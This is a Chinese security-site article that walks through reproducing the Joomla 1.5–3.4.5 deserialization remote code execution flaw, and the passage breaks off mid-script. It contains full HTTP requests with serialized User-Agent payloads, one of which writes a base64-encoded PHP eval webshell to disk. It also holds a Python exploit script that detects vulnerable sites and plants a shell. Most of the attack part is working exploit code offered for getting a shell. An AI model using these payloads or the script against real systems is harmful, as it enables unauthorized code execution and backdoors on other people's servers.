首页 > 知识 > 修改
【页面双击滚屏】
标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-1708]   作者: ecawen 发表于: [2018-08-01]  [2018-08-01]被用户:ecawen 修改过

本文共 [1876] 位读者顶过

这是最近流出来的一个漏洞,利用Joomla反序列化可以造成远程代码执行。关于该漏洞的分析可以参考一下链接: [出自:jiwo.org]

wooyun drops上的:http://drops.wooyun.org/papers/11330

Freebuf上的:http://www.freebuf.com/vuls/89754.html

360播报上的:http://bobao.360.cn/learning/detail/2501.html

自定义生成Exp序列化的程序:http://sandbox.onlinephpfunctions.com/code/d7a86325f725cbe9e7a60ef696d65593f6abdc1f

在这里,记录一下我自己复现漏洞时候遇到的坑。细节很重要呐,最后复现成功才发现问题所在。

首先是关于phpinfo的代码执行,这个复现起来比较简单。Exp如下: 



GET /joomla/ HTTP/1.1



Host: 192.168.145.130



User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:31:"phpinfo();JFactory::get();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}~Ù



Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8



Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3



Accept-Encoding: gzip, deflate



Connection: keep-alive



Cache-Control: max-age=0








	 首先是发送带Exp的包,获取cookie: 




	1 




	 然后用获取的cookies再次发包即可完成代码执行: 




	2 




	 这里要特别注意截断的那几个字符是不是正确,这个是关键。看一下那几个字符(只要是utf-8中4字节的都可以,范围U+010000至U+10FFFF,具体原因可以参照前面漏洞分析): 




	3 




	 好了,关于代码执行的复现到此为止。 




	 我们接下来完成一句话的复现,在这里花了比较多的时间。我采用的是file_put_contents函数来写入一句话,这里特别强调一点,写入的地址是要使用路径绝对地址的,不然写入不成功。坑呀! 




	 关于Web服务器网站路径,可以在phpinfo执行的时候获取到,然后拼接出shell的地址即可。对要写入的内容可以用base64先编码,然后file_put_contents的时候解码即可。 




	 Exp的内容如下: 





GET /joomla/ HTTP/1.1



Host: 192.168.145.130



User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:143:"file_put_contents('E://xampp//htdocs//Joomla//shell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7ID8+'));;JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}𝌆



Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8



Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3



Accept-Encoding: gzip, deflate



X-Forwarded-For: 8.8.8.8



DNT: 1



Connection: keep-alive



Cache-Control: max-age=0








	 看下成功的Exp截图: 




	4 




	 获取shell的流程和之前是一样的,先发送带Exp的包,然后包含获取的cookie的包,即可写入一句话了。 




	 最后,修改了一个可以Getshell的利用脚本: 





#!/usr/bin/env python





import requests



import sys



import time



import re





def rceJoomla(value):



    now = time.strftime('%H:%M:%S',time.localtime(time.time()))



    print "["+str(now)+"] [INFO] Checking Joomla 1.5 - 3.4.5 Remote Code Execution..."



    if 'http://' in value or 'https://' in value:



      url=value



      checkJoomlaRCE(url)





def checkJoomlaRCE(url):



    url = url.strip()



    reg = 'http[s]*://.*/$'



    m = re.match(reg,url)



    if not m:



        url = url + "/"



    poc = generate_payload("phpinfo();")



    try:



        result = get_url(url, poc)



        if 'phpinfo()' in result:



            system = getInfoByJoomlaRCE(result, 'System')



            document_root = getInfoByJoomlaRCE(result, 'DOCUMENT_ROOT')



            script_filename = getInfoByJoomlaRCE(result, 'SCRIPT_FILENAME')



            shell_file = getShellByJoomlaRCE(url, system, script_filename)



            vuls='[+]vuls found! url: '+url+'\n[+]System: '+system+'\n[+]document_root: '+document_root+'\n[+]script_filename: '+script_filename+'\n[+]shell_file: '+shell_file



            print vuls



        else:



            print '[!] no vuls! url: '+url



    except Exception,e:



        print '[!] connection failed! url: '+url





def get_url(url, user_agent):



    headers = {



    'User-Agent': user_agent



    }



    cookies = requests.get(url,headers=headers).cookies



    for _ in range(3):



        response = requests.get(url, timeout=10, headers=headers, cookies=cookies)



    return response.content







def generate_payload(php_payload):



    php_payload = php_payload



    terminate = '\xf0\x9d\x8c\x86'



    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''



    injected_payload = "{};JFactory::getConfig();exit".format(php_payload)



    exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)



    exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate



    # print exploit_template



    return exploit_template







def getInfoByJoomlaRCE(result, param):



    if "System" in param:



        reg = '.*<tr><td class="e">System